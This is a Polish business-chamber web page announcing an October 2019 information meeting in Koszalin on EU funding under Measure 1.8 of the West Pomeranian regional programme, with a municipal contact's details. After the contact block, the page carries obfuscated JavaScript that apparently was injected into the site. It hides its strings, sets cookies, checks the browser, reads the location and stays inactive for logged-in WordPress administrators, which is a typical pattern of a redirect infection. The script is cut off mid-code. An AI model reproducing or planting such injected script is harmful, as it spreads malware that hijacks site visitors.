Spotkanie infromacyjne dla MŚP – Działanie 1.8 RPOWZ | Północna Izba Gospodarcza w Koszalinie

W związku z ogłoszonym konkursem na innowacyjne projekty dla MŚP  informujemy, że w dniu 28 października br. w Koszalinie odbędzie się spotkanie dotyczące aplikowania o fundusze europejskie z Działania 1.8 – Inwestycje przedsiębiorstw w ramach Strategii ZIT dla Koszalińsko-Kołobrzesko-Białogardzkiego Obszaru Funkcjonalnego (KKBOF) finansowanego z Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego na lata 2014-2020.

Więcej informacji: http://www.rpo.wzp.pl/o-programie/konferencje-i-szkolenia/szkolenie-w-koszalinie-dotyczace-aplikowania-o-fundusze-europejskie-w-ramach-dzialania-18-inwestycje

Dokument do pobrania: Formularz zgłoszeniowy – 28.10.2019

Dane do kontaktu:

mgr inż. Renata Szott
Główny specjalista

Wydział Rozwoju i Współpracy Terytorialnej
Referat Zintegrowanych Inwestycji Terytorialnych
Urzędu Miejskiego w Koszalinie
75-007 Koszalin, ul. Rynek Staromiejski 6-7
Tel. (+48) 94 348 39 13
@: renata.szott@um.koszalin.pl
www.koszalin.pl 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m